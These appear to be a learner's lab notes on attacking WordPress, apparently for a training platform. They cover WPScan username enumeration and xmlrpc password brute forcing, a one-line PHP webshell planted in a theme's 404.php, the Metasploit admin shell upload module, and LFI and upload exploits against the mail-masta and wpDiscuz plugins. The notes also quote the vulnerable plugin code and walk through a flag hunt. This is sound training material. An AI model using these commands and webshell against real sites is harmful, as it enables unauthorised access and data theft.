# Intro - Multiple ways we can abuse `built-in functionality` to attack a WordPress installation - Below covers login brute forcing against the `wp-login.php` page and remote code execution via the theme editor - These two tactics build on each other as we need first to obtain valid credentials for an administrator-level user to log in to the WordPress back-end and edit a theme # Login Bruteforce - `WPScan` can be used to brute force usernames and passwords - The scan report in the previous section returned two users registered on the website (admin and john) - The tool uses two kinds of login brute force attacks: - [xmlrpc](https://kinsta.com/blog/xmlrpc-php/), which is the faster method, uses WordPress API to make login attempts through `/xmlrpc.php` - `wp-login` - this method will attempt to brute force the standard WordPress login page - Below is an example using the `xmlrpc` method for password attack ```bash sudo wpscan --password-attack xmlrpc -t 20 -U john -P /usr/share/wordlists/rockyou.txt --url http://blog.inlanefreight.local # --password-attack flag is used to supply the type of attack # -U argument takes in a list of users or a file containing user names # -P argument takes in a list of passwords or a file containing passwords # -t flag specifies the number of threads which we can adjust up or down ``` - Below is an example for user enum ```bash sudo wpscan -t 20 --url http://blog.inlanefreight.local --enumerate u ``` # RCE - With administrative access to WordPress, we can modify the PHP source code to execute system commands - So, log into WordPress with the credentials for the `john` user, which will redirect us to the admin panel - Then, click on `Appearance` on the side panel and select Theme Editor - This page will let us edit the PHP source code directly - An inactive theme can be selected to avoid corrupting the primary theme - After selecting an inactive theme, edit an uncommon page such as `404.php` to add a simple webshell ```php system($_GET[0]); ``` ![[images/Pasted image 20260118193631.png]] - After adding the webshell to `404.php`, click on `Update File` at the bottom to save - We know that WordPress themes are located at `/wp-content/themes/<theme name>`; thus, we can interact with the web shell via the browser or using `cURL` ```bash url http://blog.inlanefreight.local/wp-content/themes/twentynineteen/404.php?0=id ``` ## MSF Approach - The [wp_admin_shell_upload](https://www.rapid7.com/db/modules/exploit/unix/webapp/wp_admin_shell_upload/) module from Metasploit can be used to upload a shell and execute it automatically - The module uploads a malicious plugin and then uses it to execute a PHP Meterpreter shell ```bash sudo msfconcole -q msf6 > use exploit/unix/webapp/wp_admin_shell_upload msf6 exploit(unix/webapp/wp_admin_shell_upload) > show options #set USERNAME, PASSWORD, RHOSTS, RPORT, VHOST msf6 exploit(unix/webapp/wp_admin_shell_upload) > exploit meterpreter > getuid ``` # Leveraging Known Vulns - Over the years, WordPress core has suffered some vulns, but the vast majority of them can be found in plugins - According to the WordPress Vulnerability Statistics page hosted [here](https://wpscan.com/statistics), at the time of writing, there were 23,595 vulnerabilities in the `WPScan` database - 4% WordPress core - 89% plugins - 7% themes ## Vulnerable Plugins - `mail-masta` - Since 2016 the `mail-masta` plugin suffered from unauthenticated SQLi and LFI vulns - Below is the vulnerable PHP code for this plugin ```php <?php include($_GET['pl']); global $wpdb; $camp_id=$_POST['camp_id']; $masta_reports = $wpdb->prefix . "masta_reports"; $count=$wpdb->get_results("SELECT count(*) co from $masta_reports where camp_id=$camp_id and status=1"); echo $count[0]->co; ?> ``` - As shown above, the `pl` parameter allows us to include a file without any type of input validation or sanitization - Using this, we can include arbitrary files on the webserver - Below is an example using `cURL` ```bash curl -s http://blog.inlanefreight.local/wp-content/plugins/mail-masta/inc/campaign/count_of_send.php?pl=/etc/passwd ``` ## Vulnerable Plugins - `wpDiscuz` - [wpDiscuz](https://wpdiscuz.com/) is a WordPress plugin for enhanced commenting on page posts - The plugin had over [1.6 million downloads](https://wordpress.org/plugins/wpdiscuz/advanced/) and over 90K active installations, making it an extremely popular plugin - Based on the version number (7.0.4), this [exploit](https://www.exploit-db.com/exploits/49967) has a pretty good shot of getting us command execution - This is a file upload bypass because `wpDiscuz` is intended only to allow image attachments - However, the file mime type functions could be bypassed, allowing an unauthenticated attacker to upload a malicious PHP file and gain RCE ```bash python3 wp_discuz.py -u http://blog.inlanefreight.local -p /?p=1 # the -p flag specifies the path to a valid post ``` - While the above exploit may not give us ultimate RCE, it still writes a webshell that we can access using `cURL` - We just need to append `?cmd=` after the `.php` extension to run commands which we can see in the exploit script ```bash curl -s http://blog.inlanefreight.local/wp-content/uploads/2021/08/uthsdkbywoxeebg-1629904090.8191.php?cmd=id ``` # Exercise ## takeaways - While Apache's default webroot is `/var/www/html`, if we are dealing with vHosts, visit `/var/www` and go into individual vHost sub-webroots ## initial enum - `ping` test ![[images/Pasted image 20260118195332.png]] - `nmap` scans ![[images/Pasted image 20260118195327.png]]![[images/Pasted image 20260118202022.png]] - update `/etc/hosts` ![[images/Pasted image 20260118195320.png]] ## user enum - not that if no `--username/s` option supplied, user enum will be run ![[images/Pasted image 20260118195720.png]] ```bash sudo wpscan -t 20 --url http://blog.inlanefreight.local ``` ![[images/Pasted image 20260118195912.png]] - let's specify a usernames list - same results as above ![[images/Pasted image 20260118200150.png]] - after some googling, let's try the below for username enum ```bash sudo wpscan -t 20 --url http://blog.inlanefreight.local --enumerate u ``` - now we are getting somewhere ![[images/Pasted image 20260118200247.png]] ## password attack - load up the below password attack ```bash sudo wpscan --password-attack xmlrpc -t 20 -U doug -P /opt/rockyou.txt --url http://blog.inlanefreight.local ``` - we have the below password after 13sec ![[images/Pasted image 20260118200456.png]] ## login as `doug` and read `/etc/passwd` - browse to admin login page at `http://blog.inlanefreight.local/wp-login.php` ![[images/Pasted image 20260118200659.png]] - after logging in as `doug`, we see the below page ![[images/Pasted image 20260118200852.png]] - below are the active plugins ![[images/Pasted image 20260118201005.png]] ### modify inactive theme for RCE - view `themes` tab under `appearance`![[images/Pasted image 20260118201126.png]] - transport gravity is currently actives - let's modify twenty nineteen by going to the `threme editor` tab under `appearance` and selecting the them to edit, then select the `404 template` - add the webshell, and click on `update file` ![[images/Pasted image 20260118201502.png]] - indication that file edits successfully ![[images/Pasted image 20260118201640.png]] ![[images/Pasted image 20260118201647.png]] - test the webshell with below `cURL` command ```bash curl http://blog.inlanefreight.local/wp-content/themes/twentynineteen/404.php?0=id ``` - we have code execution ![[images/Pasted image 20260118201800.png]] - now let's read `/etc/passwd` ![[images/Pasted image 20260118201858.png]] ## find flag - default Apache webroot is `/var/www/html` > try to `ls` this path ![[images/Pasted image 20260118202209.png]] - hmmm nothing - let's `cat` `/etc/apache2/apache2.conf` to determine webroot ![[images/Pasted image 20260118202501.png]] - maybe the problem is we are only a member of `www-data`? - let's list a directory above html ![[images/Pasted image 20260118202732.png]] - since we are attacks `blog.inlanefreight.local` let's list this directory - here's the flag ![[images/Pasted image 20260118202823.png]] - now let's `cat` the flag ![[images/Pasted image 20260118203121.png]]